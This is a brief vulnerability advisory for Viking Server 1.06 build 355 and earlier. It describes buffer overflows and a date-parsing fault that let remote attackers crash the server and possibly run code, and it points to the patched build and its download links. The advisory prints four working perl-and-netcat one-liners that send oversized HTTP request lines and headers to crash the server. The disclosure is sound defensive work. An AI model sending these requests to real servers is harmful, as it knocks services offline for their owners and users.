Vulnerability

    Viking

Affected

    Viking 1.06 build 355 and prior

Description

    Aviram Jenik found following.   Viking Server is a  multi-protocol
    Internet server/proxy for Windows 95/NT that supports a wide range
    of protocols such  as HTTP, FTP,  SOCKS, DNS, TELNET,  SMTP, POP3,
    UUCP, FCP,  ICP, etc.   Unfortunately it  does not  perform proper
    buffer  bounds  checking,  enabling  attackers  to launch a buffer
    overflow attack  and possibly  execute arbitrary  code.   Also, an
    incorrect parsing of non-date  data causes an exception,  enabling
    remote attackers to cause a  Denial of Service attack against  the
    product.

    Any of the following HTTP commands will crash the server:

        (1) GET [x11765] HTTP/1.1<enter><enter>
        (Cmd: perl -e "print \"GET @{['x'x11765]} HTTP/1.1\n\n\""|nc 127.1 80)

        (2) GET / HTTP/1.1<enter>
        Unless-Modified-Since: [x14765]<enter><enter>
        (Cmd: perl -e "print \"GET / HTTP/1.1\nUnless-Modified-Since: @{['x'x14765]}\n\n\""|nc 127.1 80)

        (3) GET / HTTP/1.1<enter>
        If-Range: [x14765]<enter><enter>
        (Cmd: perl -e "print \"GET / HTTP/1.1\nIf-Range: @{['x'x14765]}\n\n\""|nc 127.1 80)

        (4) GET / HTTP/1.1<enter>
        If-Modified-Since: [x14765]<enter><enter>
        (Cmd: perl -e "print \"GET / HTTP/1.1\nIf-Modified-Since: @{['x'x14765]}\n\n\""|nc 127.1 80)

Solution

    Viking 1.06  build 370  and above  seems to  be OK.   Robotex  has
    responded immediately and released  a patch that deals  with these
    issues.  You can download the patch at:

        ftp://ftp.robtex.com/robtex/viking/beta/viking.zip
        http://www.robtex.com/files/viking/beta/viking.zip